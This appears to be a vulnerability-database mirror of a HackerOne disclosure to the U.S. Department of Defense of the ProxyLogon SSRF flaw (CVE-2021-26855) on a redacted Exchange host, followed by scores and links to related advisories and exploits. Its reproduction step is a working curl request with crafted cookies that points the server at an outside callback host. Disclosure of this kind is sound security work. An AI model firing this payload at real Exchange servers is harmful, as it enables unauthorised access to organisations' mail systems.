Lucene search
SpongebhavH1:1119228HistoryMar 07, 2021 - 11:37 a.m.
U.S. Dept Of Defense: CVE-2021-26855 on ████████ resulting in SSRF
2021-03-0711:37:32
spongebhav
hackerone.com
677
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Description:CVE-2021-26855 exists on███████ resulting** in SSRF
References
https://vulners.com/cve/CVE-2021-26855
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
Impact
Server Side Request Frogery
System Host(s)
███████
Affected Product(s) and Version(s)
CVE Numbers
CVE-2021-26855
Steps to Reproduce
curl -i -s -k -X $'GET' \
-H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \
$'https://████████/owa/auth/x.js'
OUTPUT:
██████████
Suggested Mitigation/Remediation Actions
Related
mssecure
mssecure
Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus
2021-03-18 22:00:47
Analyzing attacks taking advantage of the Exchange Server vulnerabilities
2021-03-25 21:21:07
Microsoft investigates Iranian attacks against the Albanian government
2022-09-08 15:00:00
githubexploit
githubexploit
Exploit for Server-Side Request Forgery in Microsoft
2021-03-11 20:51:48
Exploit for Server-Side Request Forgery in Microsoft
2021-03-17 03:32:19
Exploit for Server-Side Request Forgery in Microsoft
2021-03-15 14:03:16
thn
thn
CISA Issues Emergency Directive on In-the-Wild Microsoft Exchange Flaws
2021-03-04 08:26:00
APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor
2022-06-28 11:30:00
metasploit
metasploit
Microsoft Exchange ProxyLogon Collector
2021-03-09 19:52:01
Microsoft Exchange ProxyLogon RCE
2021-03-12 23:49:45
Microsoft Exchange ProxyLogon Scanner
2021-03-07 13:37:20
hackerone
hackerone
U.S. Dept Of Defense: SSRF due to CVE-2021-26855 on ████████
2021-03-07 11:31:33
saint
saint
Microsoft Exchange Server ProxyLogon vulnerability
2021-03-19 00:00:00
Microsoft Exchange Server ProxyLogon vulnerability
2021-03-19 00:00:00
Microsoft Exchange Server ProxyLogon vulnerability
2021-03-19 00:00:00
malwarebytes
malwarebytes
Microsoft Exchange attacks cause panic as criminals go shell collecting
2021-03-09 19:59:37
Patch now! Exchange servers attacked by Hafnium zero-days
2021-03-03 12:34:27
securelist
securelist
Tomiris called, they want their Turla malware back
2023-04-24 08:00:22
IT threat evolution in Q2 2023
2023-08-30 10:00:05
Zero-day vulnerabilities in Microsoft Exchange Server
2021-03-04 17:20:57
packetstorm
packetstorm
Microsoft Exchange Proxylogon SSRF Proof Of Concept
2021-03-11 00:00:00
Microsoft Exchange 2019 Unauthenticated Email Download
2021-05-18 00:00:00
Microsoft Exchange 2019 SSRF / Arbitrary File Write
2021-03-18 00:00:00
nessus
nessus
Microsoft Exchange Server Authentication Bypass
2021-03-08 00:00:00
Security Updates for Microsoft Exchange Server (March 2021)
2021-03-03 00:00:00
cisa_kev
cisa_kev
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-11-03 00:00:00
hivepro
hivepro
BackdoorDiplomacy targets the telecom industry in the Middle East
2022-12-08 07:20:51
Have you patched the vulnerabilities in Microsoft Exchange Server?
2021-08-18 11:01:05
AvosLocker Ransomware group has targeted 50+ Organizations Worldwide
2022-03-24 06:30:44
cve
cve
CVE-2021-26855
2021-03-03 00:15:00
threatpost
threatpost
Mandiant Front Lines: How to Tackle Exchange Exploits
2021-04-16 14:02:54
Attackers Hijack Email Using Proxy Logon/Proxyshell Flaws
2021-11-22 19:26:25
IKEA Hit by Email Reply-Chain Cyberattack
2021-11-29 21:22:12
prion
prion
Remote code execution
2021-03-03 00:15:00
talosblog
talosblog
What Talos Incident Response learned from a recent Qakbot attack hijacking old email threads
2022-07-27 12:00:00
Threat Advisory: HAFNIUM and Microsoft Exchange zero-day
2021-03-08 10:18:43
zdt
zdt
Microsoft Exchange 2019 - Unauthenticated Email Download Exploit
2021-05-18 00:00:00
Microsoft Exchange ProxyLogon Remote Code Execution Exploit
2021-03-23 00:00:00
Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) Exploit
2021-03-11 00:00:00
qualysblog
qualysblog
Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0
2022-06-22 21:23:51
Microsoft Exchange Server Zero-Days (ProxyLogon) – Automatically Discover, Prioritize and Remediate Using Qualys VMDR
2021-03-03 22:12:19
The Rise of Ransomware
2021-10-05 12:50:00
mmpc
mmpc
Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus
2021-03-18 22:00:47
Microsoft investigates Iranian attacks against the Albanian government
2022-09-08 15:00:00
Analyzing attacks taking advantage of the Exchange Server vulnerabilities
2021-03-25 21:21:07
exploitdb
exploitdb
Microsoft Exchange 2019 - Unauthenticated Email Download
2021-05-18 00:00:00
Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)
2021-05-21 00:00:00
checkpoint_advisories
checkpoint_advisories
mskb
mskb
msrc
msrc
akamaiblog
akamaiblog
Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool
2021-03-15 22:15:00
How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange
2021-03-15 22:30:00
Authentication: Lessons Learned from Microsoft Exchange and F5 BIG-IP Hacks
2021-03-24 14:00:00
rapid7blog
rapid7blog
ics
ics
cisa
cisa
Microsoft Releases Out-of-Band Security Updates for Exchange Server
2021-03-02 00:00:00
attackerkb
attackerkb
CVE-2021-27065
2021-03-03 00:00:00
CVE-2021-26855
2021-03-03 00:00:00
krebs
krebs
Microsoft: Chinese Cyberspies Used 4 Exchange Server Flaws to Plunder Emails
2021-03-02 21:19:17
impervablog
impervablog
carbonblack
carbonblack
fireeye
fireeye
nuclei
nuclei
Microsoft Exchange Server SSRF Vulnerability
2021-03-06 07:00:59
kaspersky
kaspersky
KLA12103 ACE vulnerabilities in Microsoft Exchange Server
2021-03-02 00:00:00
wallarmlab
wallarmlab
avleonov
avleonov
Vulnerability Management news and publications #2
2022-08-14 11:30:44
Joint Advisory AA22-279A and Vulristics
2022-10-21 20:10:13
Vulristics: Microsoft Patch Tuesdays Q1 2021
2021-03-26 02:47:52
mscve
mscve
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-03-02 08:00:00
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-03-02 08:00:00
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-03-02 08:00:00
googleprojectzero
googleprojectzero
The More You Know, The More You Know You Don’t Know
2022-04-19 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Related for H1:1119228